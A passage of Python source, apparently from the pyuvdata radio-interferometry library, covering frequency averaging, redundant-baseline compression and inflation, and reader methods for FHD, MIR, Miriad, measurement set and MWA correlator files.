self.channel_width = self.channel_width * n_chan_to_avg
self.Nfreqs = n_final_chan
if self.eq_coeffs is not None:
eq_coeff_diff = np.diff(self.eq_coeffs, axis=1)
if np.abs(np.max(eq_coeff_diff)) > 0:
warnings.warn(
"eq_coeffs vary by frequency. They should be "
"applied to the data using `remove_eq_coeffs` "
"before frequency averaging."
)
self.eq_coeffs = self.eq_coeffs.reshape(
(self.Nants_telescope, n_final_chan, n_chan_to_avg)
).mean(axis=2)
if not self.metadata_only:
if self.future_array_shapes:
shape_tuple = (
self.Nblts,
n_final_chan,
n_chan_to_avg,
self.Npols,
)
else:
shape_tuple = (
self.Nblts,
1,
n_final_chan,
n_chan_to_avg,
self.Npols,
)
mask = self.flag_array.reshape(shape_tuple)
if propagate_flags:
# if any contributors are flagged, the result should be flagged
if self.future_array_shapes:
self.flag_array = np.any(
self.flag_array.reshape(shape_tuple), axis=2
)
else:
self.flag_array = np.any(
self.flag_array.reshape(shape_tuple), axis=3
)
else:
# if all inputs are flagged, the flag array should be True,
# otherwise it should be False.
# The sum below will be zero if it's all flagged and
# greater than zero otherwise
# Then we use a test against 0 to turn it into a Boolean
if self.future_array_shapes:
self.flag_array = (
np.sum(~self.flag_array.reshape(shape_tuple), axis=2) == 0
)
else:
self.flag_array = (
np.sum(~self.flag_array.reshape(shape_tuple), axis=3) == 0
)
# need to update mask if a downsampled visibility will be flagged
# so that we don't set it to zero
for n_chan in np.arange(n_final_chan):
if self.future_array_shapes:
if (self.flag_array[:, n_chan]).any():
ax0_inds, ax2_inds = np.nonzero(self.flag_array[:, n_chan, :])
# Only if all entries are masked
# May not happen due to propagate_flags keyword
# mask should be left alone otherwise
if np.all(mask[ax0_inds, n_chan, :, ax2_inds]):
mask[ax0_inds, n_chan, :, ax2_inds] = False
else:
if (self.flag_array[:, :, n_chan]).any():
ax0_inds, ax1_inds, ax3_inds = np.nonzero(
self.flag_array[:, :, n_chan, :]
)
# Only if all entries are masked
# May not happen due to propagate_flags keyword
# mask should be left alone otherwise
if np.all(mask[ax0_inds, ax1_inds, n_chan, :, ax3_inds]):
mask[ax0_inds, ax1_inds, n_chan, :, ax3_inds] = False
masked_data = np.ma.masked_array(
self.data_array.reshape(shape_tuple), mask=mask
)
self.nsample_array = self.nsample_array.reshape(shape_tuple)
# promote nsample dtype if half-precision
nsample_dtype = self.nsample_array.dtype.type
if nsample_dtype is np.float16:
masked_nsample_dtype = np.float32
else:
masked_nsample_dtype = nsample_dtype
masked_nsample = np.ma.masked_array(
self.nsample_array, mask=mask, dtype=masked_nsample_dtype
)
if summing_correlator_mode:
if self.future_array_shapes:
self.data_array = np.sum(masked_data, axis=2).data
else:
self.data_array = np.sum(masked_data, axis=3).data
else:
# need to weight by the nsample_array
if self.future_array_shapes:
self.data_array = (
np.sum(masked_data * masked_nsample, axis=2)
/ np.sum(masked_nsample, axis=2)
).data
else:
self.data_array = (
np.sum(masked_data * masked_nsample, axis=3)
/ np.sum(masked_nsample, axis=3)
).data
# nsample array is the fraction of data that we actually kept,
# relative to the amount that went into the sum or average.
# Need to take care to return precision back to original value.
if self.future_array_shapes:
self.nsample_array = (
np.sum(masked_nsample, axis=2) / float(n_chan_to_avg)
).data.astype(nsample_dtype)
else:
self.nsample_array = (
np.sum(masked_nsample, axis=3) / float(n_chan_to_avg)
).data.astype(nsample_dtype)
def get_redundancies(
self,
tol=1.0,
use_antpos=False,
include_conjugates=False,
include_autos=True,
conjugate_bls=False,
):
"""
Get redundant baselines to a given tolerance.
This can be used to identify redundant baselines present in the data,
or find all possible redundant baselines given the antenna positions.
Parameters
----------
tol : float
Redundancy tolerance in meters (default 1m).
use_antpos : bool
Use antenna positions to find all possible redundant groups for this
telescope (default False).
The returned baselines are in the 'u>0' convention.
include_conjugates : bool
Option to include baselines that are redundant under conjugation.
Only used if use_antpos is False.
include_autos : bool
Option to include autocorrelations in the full redundancy list.
Only used if use_antpos is True.
conjugate_bls : bool
If using antenna positions, this will conjugate baselines on this
object to correspond with those in the returned groups.
Returns
-------
baseline_groups : list of lists of int
List of lists of redundant baseline numbers
vec_bin_centers : list of ndarray of float
List of vectors describing redundant group uvw centers
lengths : list of float
List of redundant group baseline lengths in meters
conjugates : list of int, or None, optional
List of indices for baselines that must be conjugated to fit into their
redundant groups.
Will return None if use_antpos is True and include_conjugates is True
Only returned if include_conjugates is True
Notes
-----
If use_antpos is set, then this function will find all redundant baseline groups
for this telescope, under the u>0 antenna ordering convention.
If use_antpos is not set, this function will look for redundant groups
in the data.
"""
if use_antpos:
antpos, numbers = self.get_ENU_antpos(center=False)
result = uvutils.get_antenna_redundancies(
numbers, antpos, tol=tol, include_autos=include_autos
)
if conjugate_bls:
self.conjugate_bls(convention="u>0", uvw_tol=tol)
if include_conjugates:
result = result + (None,)
return result
_, unique_inds = np.unique(self.baseline_array, return_index=True)
unique_inds.sort()
baseline_vecs = np.take(self.uvw_array, unique_inds, axis=0)
baselines = np.take(self.baseline_array, unique_inds)
return uvutils.get_baseline_redundancies(
baselines, baseline_vecs, tol=tol, with_conjugates=include_conjugates
)
def compress_by_redundancy(
self, method="select", tol=1.0, inplace=True, keep_all_metadata=True
):
"""
Downselect or average to only have one baseline per redundant group.
Either select the first baseline in the redundant group or average over
the baselines in the redundant group.
Uses utility functions to find redundant baselines to the given tolerance,
then select on those.
Parameters
----------
tol : float
Redundancy tolerance in meters, default is 1.0 corresponding to 1 meter.
method : str
Options are "select", which just keeps the first baseline in each
redundant group or "average" which averages over the baselines in each
redundant group and assigns the average to the first baseline in the group.
inplace : bool
Option to do selection on current object.
keep_all_metadata : bool
Option to keep all the metadata associated with antennas,
even those that do not remain after the select option.
Returns
-------
UVData object or None
if inplace is False, return the compressed UVData object
"""
allowed_methods = ["select", "average"]
if method not in allowed_methods:
raise ValueError(f"method must be one of {allowed_methods}")
red_gps, centers, lengths, conjugates = self.get_redundancies(
tol, include_conjugates=True
)
bl_ants = [self.baseline_to_antnums(gp[0]) for gp in red_gps]
if method == "average":
# do a metadata only select to get all the metadata right
new_obj = self.copy(metadata_only=True)
new_obj.select(bls=bl_ants, keep_all_metadata=keep_all_metadata)
if not self.metadata_only:
# initalize the data like arrays
if new_obj.future_array_shapes:
temp_data_array = np.zeros(
(new_obj.Nblts, new_obj.Nfreqs, new_obj.Npols),
dtype=self.data_array.dtype,
)
temp_nsample_array = np.zeros(
(new_obj.Nblts, new_obj.Nfreqs, new_obj.Npols),
dtype=self.nsample_array.dtype,
)
temp_flag_array = np.zeros(
(new_obj.Nblts, new_obj.Nfreqs, new_obj.Npols),
dtype=self.flag_array.dtype,
)
else:
temp_data_array = np.zeros(
(new_obj.Nblts, 1, new_obj.Nfreqs, new_obj.Npols),
dtype=self.data_array.dtype,
)
temp_nsample_array = np.zeros(
(new_obj.Nblts, 1, new_obj.Nfreqs, new_obj.Npols),
dtype=self.nsample_array.dtype,
)
temp_flag_array = np.zeros(
(new_obj.Nblts, 1, new_obj.Nfreqs, new_obj.Npols),
dtype=self.flag_array.dtype,
)
for grp_ind, group in enumerate(red_gps):
if len(conjugates) > 0:
conj_group = set(group).intersection(conjugates)
reg_group = list(set(group) - conj_group)
conj_group = list(conj_group)
else:
reg_group = group
conj_group = []
group_times = []
group_inds = []
conj_group_inds = []
conj_group_times = []
for bl in reg_group:
bl_inds = np.where(self.baseline_array == bl)[0]
group_inds.extend(bl_inds)
group_times.extend(self.time_array[bl_inds])
for bl in conj_group:
bl_inds = np.where(self.baseline_array == bl)[0]
conj_group_inds.extend(bl_inds)
conj_group_times.extend(self.time_array[bl_inds])
group_inds = np.array(group_inds, dtype=np.int64)
conj_group_inds = np.array(conj_group_inds, dtype=np.int64)
# now we have to figure out which times are the same to a tolerance
# so we can average over them.
time_inds = np.arange(len(group_times + conj_group_times))
time_gps = uvutils.find_clusters(
time_inds,
np.array(group_times + conj_group_times),
self._time_array.tols[1],
)
# average over the same times
obj_bl = bl_ants[grp_ind]
obj_inds = new_obj._key2inds(obj_bl)[0]
obj_times = new_obj.time_array[obj_inds]
for gp in time_gps:
# Note that this average time is just used for identifying the
# index to use for the blt axis on the averaged data set.
# We do not update the actual time on that data set because it can
# result in confusing behavior -- small numerical rounding errors
# can result in many more unique times in the final data set than
# in the initial data set.
avg_time = np.average(np.array(group_times + conj_group_times)[gp])
obj_time_ind = np.where(
np.abs(obj_times - avg_time) < self._time_array.tols[1]
)[0]
if obj_time_ind.size == 1:
this_obj_ind = obj_inds[obj_time_ind[0]]
else:
warnings.warn(
"Index baseline in the redundant group does not "
"have all the times, compressed object will be "
"missing those times."
)
continue
# time_ind contains indices for both regular and conjugated bls
# because we needed to group them together in time.
# The regular ones are first and extend the length of group_times,
# so we use that to split them back up.
regular_orientation = np.array(
[time_ind for time_ind in gp if time_ind < len(group_times)],
dtype=np.int64,
)
regular_inds = group_inds[np.array(regular_orientation)]
conj_orientation = np.array(
[
time_ind - len(group_times)
for time_ind in gp
if time_ind >= len(group_times)
],
dtype=np.int64,
)
conj_inds = conj_group_inds[np.array(conj_orientation)]
# check that the integration times are all the same
int_times = np.concatenate(
(
self.integration_time[regular_inds],
self.integration_time[conj_inds],
)
)
if not np.all(
np.abs(int_times - new_obj.integration_time[obj_time_ind])
< new_obj._integration_time.tols[1]
):
warnings.warn(
"Integrations times are not identical in a redundant "
"group. Averaging anyway but this may cause unexpected "
"behavior."
)
if not self.metadata_only:
vis_to_avg = np.concatenate(
(
self.data_array[regular_inds],
np.conj(self.data_array[conj_inds]),
)
)
nsample_to_avg = np.concatenate(
(
self.nsample_array[regular_inds],
self.nsample_array[conj_inds],
)
)
flags_to_avg = np.concatenate(
(self.flag_array[regular_inds], self.flag_array[conj_inds],)
)
# if all data is flagged, average it all as if it were not
if np.all(flags_to_avg):
mask = np.zeros_like(flags_to_avg)
else:
mask = flags_to_avg
vis_to_avg = np.ma.masked_array(vis_to_avg, mask=mask)
nsample_to_avg = np.ma.masked_array(nsample_to_avg, mask=mask)
avg_vis = np.ma.average(
vis_to_avg, weights=nsample_to_avg, axis=0
)
avg_nsample = np.sum(nsample_to_avg, axis=0)
avg_flag = np.all(flags_to_avg, axis=0)
temp_data_array[this_obj_ind] = avg_vis
temp_nsample_array[this_obj_ind] = avg_nsample
temp_flag_array[this_obj_ind] = avg_flag
if inplace:
self.select(bls=bl_ants, keep_all_metadata=keep_all_metadata)
if not self.metadata_only:
self.data_array = temp_data_array
self.nsample_array = temp_nsample_array
self.flag_array = temp_flag_array
self.check()
return
else:
if not self.metadata_only:
new_obj.data_array = temp_data_array
new_obj.nsample_array = temp_nsample_array
new_obj.flag_array = temp_flag_array
new_obj.check()
return new_obj
else:
return self.select(
bls=bl_ants, inplace=inplace, keep_all_metadata=keep_all_metadata
)
def inflate_by_redundancy(self, tol=1.0, blt_order="time", blt_minor_order=None):
"""
Expand data to full size, copying data among redundant baselines.
Note that this method conjugates baselines to the 'u>0' convention in order
to inflate the redundancies.
Parameters
----------
tol : float
Redundancy tolerance in meters, default is 1.0 corresponding to 1 meter.
blt_order : str
string specifying primary order along the blt axis (see `reorder_blts`)
blt_minor_order : str
string specifying minor order along the blt axis (see `reorder_blts`)
"""
self.conjugate_bls(convention="u>0")
red_gps, centers, lengths = self.get_redundancies(
tol=tol, use_antpos=True, conjugate_bls=True
)
# Stack redundant groups into one array.
group_index, bl_array_full = zip(
*[(i, bl) for i, gp in enumerate(red_gps) for bl in gp]
)
# TODO should be an assert that each baseline only ends up in one group
# Map group index to blt indices in the compressed array.
bl_array_comp = self.baseline_array
uniq_bl = np.unique(bl_array_comp)
group_blti = {}
Nblts_full = 0
for i, gp in enumerate(red_gps):
for bl in gp:
# First baseline in the group that is also in the compressed
# baseline array.
if bl in uniq_bl:
group_blti[i] = np.where(bl == bl_array_comp)[0]
# add number of blts for this group
Nblts_full += group_blti[i].size * len(gp)
break
blt_map = np.zeros(Nblts_full, dtype=int)
full_baselines = np.zeros(Nblts_full, dtype=int)
missing = []
counter = 0
for bl, gi in zip(bl_array_full, group_index):
try:
# this makes the time the fastest axis
blt_map[counter : counter + group_blti[gi].size] = group_blti[gi]
full_baselines[counter : counter + group_blti[gi].size] = bl
counter += group_blti[gi].size
except KeyError:
missing.append(bl)
pass
if np.any(missing):
warnings.warn("Missing some redundant groups. Filling in available data.")
# blt_map is an index array mapping compressed blti indices to uncompressed
self.data_array = self.data_array[blt_map, ...]
self.nsample_array = self.nsample_array[blt_map, ...]
self.flag_array = self.flag_array[blt_map, ...]
self.time_array = self.time_array[blt_map]
self.lst_array = self.lst_array[blt_map]
self.integration_time = self.integration_time[blt_map]
self.uvw_array = self.uvw_array[blt_map, ...]
self.baseline_array = full_baselines
self.ant_1_array, self.ant_2_array = self.baseline_to_antnums(
self.baseline_array
)
self.Nants_data = self._calc_nants_data()
self.Nbls = np.unique(self.baseline_array).size
self.Nblts = Nblts_full
if self.phase_center_app_ra is not None:
self.phase_center_app_ra = self.phase_center_app_ra[blt_map]
if self.phase_center_app_dec is not None:
self.phase_center_app_dec = self.phase_center_app_dec[blt_map]
if self.phase_center_frame_pa is not None:
self.phase_center_frame_pa = self.phase_center_frame_pa[blt_map]
if self.multi_phase_center:
self.phase_center_id_array = self.phase_center_id_array[blt_map]
self.reorder_blts(order=blt_order, minor_order=blt_minor_order)
self.check()
def _convert_from_filetype(self, other):
"""
Convert from a file-type specific object to a UVData object.
Used in reads.
Parameters
----------
other : object that inherits from UVData
File type specific object to convert to UVData
"""
for p in other:
param = getattr(other, p)
setattr(self, p, param)
def _convert_to_filetype(self, filetype):
"""
Convert from a UVData object to a file-type specific object.
Used in writes.
Parameters
----------
filetype : str
Specifies what file type object to convert to. Options are: 'uvfits',
'fhd', 'miriad', 'uvh5', 'mir', 'ms'
Raises
------
ValueError
if filetype is not a known type
"""
if filetype == "uvfits":
from . import uvfits
other_obj = uvfits.UVFITS()
elif filetype == "fhd":
from . import fhd
other_obj = fhd.FHD()
elif filetype == "miriad":
from . import miriad
other_obj = miriad.Miriad()
elif filetype == "uvh5":
from . import uvh5
other_obj = uvh5.UVH5()
elif filetype == "mir":
from . import mir
other_obj = mir.Mir()
elif filetype == "ms":
from . import ms
other_obj = ms.MS()
else:
raise ValueError("filetype must be uvfits, mir, miriad, ms, fhd, or uvh5")
for p in self:
param = getattr(self, p)
setattr(other_obj, p, param)
return other_obj
def read_fhd(
self,
filelist,
use_model=False,
axis=None,
read_data=True,
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Read in data from a list of FHD files.
Parameters
----------
filelist : array_like of str
The list/array of FHD save files to read from. Must include at
least one polarization file, a params file, a layout file and a flag file.
An obs file is also required if `read_data` is False.
use_model : bool
Option to read in the model visibilities rather than the dirty
visibilities (the default is False, meaning the dirty visibilities
will be read).
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple data sets are passed.
read_data : bool
Read in the visibility, nsample and flag data. If set to False, only
the metadata will be read in. Setting read_data to False results in
a metadata only object. If read_data is False, an obs file must be
included in the filelist.
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after after reading in the file (the default is True,
meaning the check will be run).
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done).
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Raises
------
ValueError
If required files are missing or multiple files for any polarization
are included in filelist.
If there is no recognized key for visibility weights in the flags_file.
"""
from . import fhd
if isinstance(filelist[0], (list, tuple, np.ndarray)):
raise ValueError(
"Reading multiple files from class specific "
"read functions is no longer supported. "
"Use the generic `uvdata.read` function instead."
)
fhd_obj = fhd.FHD()
fhd_obj.read_fhd(
filelist,
use_model=use_model,
background_lsts=background_lsts,
read_data=read_data,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
self._convert_from_filetype(fhd_obj)
del fhd_obj
def read_mir(
self,
filepath,
isource=None,
irec=None,
isb=None,
corrchunk=None,
pseudo_cont=False,
):
"""
Read in data from an SMA MIR file.
Note that with the exception of filepath, the reset of the parameters are
used to sub-select a range of data that matches the limitations of the current
instantiation of pyuvdata -- namely 1 spectral window, 1 source. These could
be dropped in the future, as pyuvdata capabilities grow.
Parameters
----------
filepath : str
The file path to the MIR folder to read from.
isource : int
Source code for MIR dataset
irec : int
Receiver code for MIR dataset
isb : int
Sideband code for MIR dataset
corrchunk : int
Correlator chunk code for MIR dataset
pseudo_cont : boolean
Read in only pseudo-continuuum values. Default is false.
"""
from . import mir
mir_obj = mir.Mir()
mir_obj.read_mir(
filepath,
isource=isource,
irec=irec,
isb=isb,
corrchunk=corrchunk,
pseudo_cont=pseudo_cont,
)
self._convert_from_filetype(mir_obj)
del mir_obj
def read_miriad(
self,
filepath,
axis=None,
antenna_nums=None,
ant_str=None,
bls=None,
polarizations=None,
time_range=None,
read_data=True,
phase_type=None,
correct_lat_lon=True,
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
calc_lst=True,
fix_old_proj=False,
fix_use_ant_pos=True,
):
"""
Read in data from a miriad file.
Parameters
----------
filepath : str
The miriad root directory to read from.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple files are passed.
antenna_nums : array_like of int, optional
The antennas numbers to read into the object.
bls : list of tuple, optional
A list of antenna number tuples (e.g. [(0, 1), (3, 2)]) or a list of
baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]) specifying baselines
to include when reading data into the object. For length-2 tuples,
the ordering of the numbers within the tuple does not matter. For
length-3 tuples, the polarization string is in the order of the two
antennas. If length-3 tuples are provided, `polarizations` must be
None.
ant_str : str, optional
A string containing information about what antenna numbers
and polarizations to include when reading data into the object.
Can be 'auto', 'cross', 'all', or combinations of antenna numbers
and polarizations (e.g. '1', '1_2', '1x_2y'). See tutorial for more
examples of valid strings and the behavior of different forms for ant_str.
If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
An ant_str cannot be passed in addition to any of `antenna_nums`,
`bls` or `polarizations` parameters, if it is a ValueError will be raised.
polarizations : array_like of int or str, optional
List of polarization integers or strings to read-in. e.g. ['xx', 'yy', ...]
time_range : list of float, optional
len-2 list containing min and max range of times in Julian Date to
include when reading data into the object. e.g. [2458115.20, 2458115.40]
read_data : bool
Read in the visibility and flag data. If set to false,
only the metadata will be read in. Setting read_data to False
results in an incompletely defined object (check will not pass).
phase_type : str, optional
Option to specify the phasing status of the data. Options are 'drift',
'phased' or None. 'drift' means the data are zenith drift data,
'phased' means the data are phased to a single RA/Dec. Default is None
meaning it will be guessed at based on the file contents.
correct_lat_lon : bool
Option to update the latitude and longitude from the known_telescopes
list if the altitude is missing.
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after after reading in the file (the default is True,
meaning the check will be run). Ignored if read_data is False.
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
Ignored if read_data is False.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done). Ignored if read_data is False.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
calc_lst : bool
Recalculate the LST values that are present within the file, useful in
cases where the "online" calculate values have precision or value errors.
Default is True.
fix_old_proj : bool
Applies a fix to uvw-coordinates and phasing, assuming that the old `phase`
method was used prior to writing the data, which had errors of the order of
one part in 1e4 - 1e5. See the phasing memo for more details. Default is
False.
fix_use_ant_pos : bool
If setting `fix_old_proj` to True, use the antenna positions to derive the
correct uvw-coordinates rather than using the baseline vectors. Default is
True.
Raises
------
IOError
If root file directory doesn't exist.
ValueError
If incompatible select keywords are set (e.g. `ant_str` with other
antenna selectors, `times` and `time_range`) or select keywords
exclude all data or if keywords are set to the wrong type.
If the data are multi source or have multiple
spectral windows.
If the metadata are not internally consistent.
"""
from . import miriad
if isinstance(filepath, (list, tuple, np.ndarray)):
raise ValueError(
"Reading multiple files from class specific "
"read functions is no longer supported. "
"Use the generic `uvdata.read` function instead."
)
miriad_obj = miriad.Miriad()
miriad_obj.read_miriad(
filepath,
correct_lat_lon=correct_lat_lon,
read_data=read_data,
phase_type=phase_type,
antenna_nums=antenna_nums,
ant_str=ant_str,
bls=bls,
polarizations=polarizations,
time_range=time_range,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
calc_lst=calc_lst,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
)
self._convert_from_filetype(miriad_obj)
del miriad_obj
def read_ms(
self,
filepath,
axis=None,
data_column="DATA",
pol_order="AIPS",
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
ignore_single_chan=True,
raise_error=True,
read_weights=True,
):
"""
Read in data from a measurement set.
Parameters
----------
filepath : str
The measurement set root directory to read from.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple files are passed.
data_column : str
name of CASA data column to read into data_array. Options are:
'DATA', 'MODEL', or 'CORRECTED_DATA'
pol_order : str
Option to specify polarizations order convention, options are
'CASA' or 'AIPS'.
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after after reading in the file (the default is True,
meaning the check will be run).
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done).
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
ignore_single_chan : bool
Some measurement sets (e.g., those from ALMA) use single channel spectral
windows for recording pseudo-continuum channels or storing other metadata
in the track when the telescopes are not on source. Because of the way
the object is strutured (where all spectral windows are assumed to be
simultaneously recorded), this can significantly inflate the size and memory
footprint of UVData objects. By default, single channel windows are ignored
to avoid this issue, although they can be included if setting this parameter
equal to True.
raise_error : bool
The measurement set format allows for different spectral windows and
polarizations to have different metdata for the same time-baseline
combination, but UVData objects do not. If detected, by default the reader
will throw an error. However, if set to False, the reader will simply give
a warning, and will use the first value read in the file as the "correct"
metadata in the UVData object.
read_weights : bool
Read in the weights from the MS file, default is True. If false, the method
will set the `nsamples_array` to the same uniform value (namely 1.0).
Raises
------
IOError
If root file directory doesn't exist.
ValueError
If the `data_column` is not set to an allowed value.
If the data are have multiple subarrays or are multi source or have
multiple spectral windows.
If the data have multiple data description ID values.
"""
if isinstance(filepath, (list, tuple, np.ndarray)):
raise ValueError(
"Reading multiple files from class specific "
"read functions is no longer supported. "
"Use the generic `uvdata.read` function instead."
)
from . import ms
ms_obj = ms.MS()
ms_obj.read_ms(
filepath,
data_column=data_column,
pol_order=pol_order,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
ignore_single_chan=ignore_single_chan,
raise_error=raise_error,
read_weights=read_weights,
)
self._convert_from_filetype(ms_obj)
del ms_obj
def read_mwa_corr_fits(
self,
filelist,
axis=None,
use_aoflagger_flags=None,
use_cotter_flags=None,
remove_dig_gains=True,
remove_coarse_band=True,
correct_cable_len=False,
correct_van_vleck=False,
cheby_approx=True,
flag_small_auto_ants=True,
flag_small_sig_ants=None,
propagate_coarse_flags=True,
flag_init=True,
edge_width=80e3,
start_flag="goodtime",
end_flag=0.0,
flag_dc_offset=True,
remove_flagged_ants=True,
phase_to_pointing_center=False,
read_data=True,
data_array_dtype=np.complex64,
nsample_array_dtype=np.float32,
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Read in MWA correlator gpu box files.
The default settings remove some of the instrumental effects in the bandpass
by dividing out the digital gains and the coarse band shape.
If the desired output is raw correlator data, set remove_dig_gains=False,
remove_coarse_band=False, correct_cable_len=False, and
phase_to_pointing_center=False.
Parameters
----------
filelist : list of str
The list of MWA correlator files to read from. Must include at
least one fits file and only one metafits file per data set.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple files are passed.
use_aoflagger_flags : bool
Option to use aoflagger mwaf flag files. Defaults to true if aoflagger
flag files are submitted.
use_cotter_flags : bool
Being replaced by use_aoflagger_flags and will be removed in v2.4.
remove_dig_gains : bool
Option to divide out digital gains.
remove_coarse_band : bool
Option to divide out coarse band shape.
correct_cable_len : bool
Option to apply a cable delay correction.
correct_van_vleck : bool
Option to apply a van vleck correction.
cheby_approx : bool
Only used if correct_van_vleck is True. Option to implement the van
vleck correction with a chebyshev polynomial approximation.
flag_small_auto_ants : bool
Only used if correct_van_vleck is True. Option to completely flag any
antenna for which the autocorrelation falls below a threshold found by
the Van Vleck correction to indicate bad data. Specifically, the
threshold used is 0.5 * integration_time * channel_width. If set to False,
only the times and frequencies at which the auto is below the
threshold will be flagged for the antenna.
flag_small_sig_ants : bool
Being replaced with flag_small_auto_ants and will be removed in v2.4.
propagate_coarse_flags : bool
Option to propagate flags for missing coarse channel integrations
across frequency.
flag_init: bool
Set to True in order to do routine flagging of coarse channel edges,
start or end integrations, or the center fine channel of each coarse
channel. See associated keywords.
edge_width: float
Only used if flag_init is True. Set to the width to flag on the edge
of each coarse channel, in hz. Errors if not equal to integer
multiple of channel_width. Set to 0 for no edge flagging.
start_flag: float or str
Only used if flag_init is True. The number of seconds to flag at the
beginning of the observation. Set to 0 for no flagging. Default is
'goodtime', which uses information in the metafits file to determine
the length of time that should be flagged. Errors if input is not a
float or 'goodtime'. Errors if float input is not equal to an
integer multiple of the integration time.
end_flag: floats
Only used if flag_init is True. Set to the number of seconds to flag
at the end of the observation. Set to 0 for no flagging. Errors if
not an integer multiple of the integration time.
flag_dc_offset: bool
Only used if flag_init is True. Set to True to flag the center fine
channel of each coarse channel. Only used if file_type is
'mwa_corr_fits'.
remove_flagged_ants : bool
Option to perform a select to remove antennas flagged in the metafits
file. If correct_van_vleck and flag_small_auto_ants are both True then
antennas flagged by the Van Vleck correction are also removed.
phase_to_pointing_center : bool
Option to phase to the observation pointing center.
read_data : bool
Read in the visibility and flag data. If set to false, only the
basic header info and metadata read in. Setting read_data to False
results in a metdata only object.
data_array_dtype : numpy dtype
Datatype to store the output data_array as. Must be either
np.complex64 (single-precision real and imaginary) or np.complex128
(double-precision real and imaginary).
nsample_array_dtype : numpy dtype
Datatype to store the output nsample_array as. Must be either
np.float64 (double-precision), np.float32 (single-precision), or
np.float16 (half-precision). Half-precision is only recommended for
cases where no sampling or averaging of baselines will occur,
because round-off errors can be quite large (~1e-3).
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after after reading in the file (the default is True,
meaning the check will be run).
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done).
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Raises
------
ValueError
If required files are missing or multiple files metafits files are
included in filelist.
If files from different observations are included in filelist.
If files in fileslist have different fine channel widths
If file types other than fits, metafits, and mwaf files are included
in filelist.
"""
from . import mwa_corr_fits
if isinstance(filelist[0], (list, tuple, np.ndarray)):
raise ValueError(
"Reading multiple files from class specific "
"read functions is no longer supported. "
"Use the generic `uvdata.read` function instead."
)
if use_cotter_flags is not None:
use_aoflagger_flags = use_cotter_flags
warnings.warn(
"Use `use_aoflagger_flags` instead of `use_cotter_flags`."
"`use_cotter_flags` is deprecated, and will be removed in "
"pyuvdata v2.4.",
DeprecationWarning,
)
if flag_small_sig_ants is not None:
flag_small_auto_ants = flag_small_sig_ants
warnings.warn(
"Use `flag_small_auto_ants` instead of `flag_small_sig_ants`."
"`flag_small_sig_ants` is deprecated, and will be removed in "
"pyuvdata v2.4.",
DeprecationWarning,
)
corr_obj = mwa_corr_fits.MWACorrFITS()
corr_obj.read_mwa_corr_fits(
filelist,
use_aoflagger_flags=use_aoflagger_flags,
remove_dig_gains=remove_dig_gains,
remove_coarse_band=remove_coarse_band,
correct_cable_len=correct_cable_len,
correct_van_vleck=correct_van_vleck,
cheby_approx=cheby_approx,
flag_small_auto_ants=flag_small_auto_ants,
propagate_coarse_flags=propagate_coarse_flags,
flag_init=flag_init,
edge_width=edge_width,
start_flag=start_flag,
end_flag=end_flag,
flag_dc_offset=flag_dc_offset,
remove_flagged_ants=remove_flagged_ants,
phase_to_pointing_center=phase_to_pointing_center,
read_data=read_data,
data_array_dtype=data_array_dtype,
